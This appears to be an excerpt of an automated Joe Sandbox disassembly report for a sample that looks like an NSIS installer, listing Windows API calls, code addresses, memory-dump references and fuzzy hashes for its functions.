                                                                            • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                                            • CoTaskMemFree.OLE32(?), ref: 00406113
                                                                            • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                                            • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                                            Strings
                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 900638850-730719616
                                                                            • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                                            • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                                            • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                                            • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                            • GetSysColor.USER32(00000000), ref: 0040423A
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                            • SetBkMode.GDI32(?,?), ref: 00404252
                                                                            • GetSysColor.USER32(?), ref: 00404265
                                                                            • SetBkColor.GDI32(?,?), ref: 00404275
                                                                            • DeleteObject.GDI32(?), ref: 0040428F
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                            • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                            • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                                              • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                              • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                            • String ID: 9
                                                                            • API String ID: 1149667376-2366072709
                                                                            • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                                            • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                                            • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                                            • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                                            APIs
                                                                              • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                                              • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                            • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                                            • CloseHandle.KERNEL32(?), ref: 0040288F
                                                                              • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                            • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                                            • GlobalFree.KERNEL32(?), ref: 0040285E
                                                                            • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                              • Part of subcall function 00403062: SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                              • Part of subcall function 00403062: WriteFile.KERNEL32(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,?,00000000,00000000,?,?), ref: 00403115
                                                                            • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                                            • String ID:
                                                                            • API String ID: 64603807-0
                                                                            • Opcode ID: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                                            • Instruction ID: 618f9bc0fb3bf7a155370674c03f3081ddbeebb813ad2def4b435a70289f4265
                                                                            • Opcode Fuzzy Hash: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                                            • Instruction Fuzzy Hash: D4215C72C00118BFDF11AFA4CD89CAE7E79EF08364B14463AF5147A2E0C6795E419BA9
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                            • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                            • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                            • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2531174081-0
                                                                            • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                                            • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                                            • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                                            • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                            • GetTickCount.KERNEL32 ref: 00402D53
                                                                            • wsprintfW.USER32 ref: 00402D81
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                              • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                              • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                              • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,?,?), ref: 00402D13
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 722711167-2449383134
                                                                            • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                                            • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                                            • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                                            • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                                            • GetMessagePos.USER32 ref: 00404ADF
                                                                            • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                            • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                                            • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                            • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                            • wsprintfW.USER32 ref: 00402CD1
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                            • API String ID: 1451636040-1158693248
                                                                            • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                            • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                                            • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                            • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                                            • wsprintfW.USER32 ref: 00404A70
                                                                            • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$&B
                                                                            • API String ID: 3540041739-2907463167
                                                                            • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                                            • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                                            • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                                            • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                            • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                                            • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":
                                                                            • API String ID: 589700163-165019052
                                                                            • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                            • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                                            • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                            • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,?,?,?,00000021), ref: 0040252F
                                                                            • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,?,?,?,00000021), ref: 00402536
                                                                            • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                                                            • String ID: 8
                                                                            • API String ID: 1453599865-4194326291
                                                                            • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                                            • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                                            • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                                            • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                                            • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                                              • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                              • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                              • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 1941528284-0
                                                                            • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                                            • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                                            • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                                            • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteEnumOpen
                                                                            • String ID:
                                                                            • API String ID: 1912718029-0
                                                                            • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                                            • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                                            • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                                            • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                            • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                            • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                            • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401D44
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                            • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID:
                                                                            • API String ID: 3808545654-0
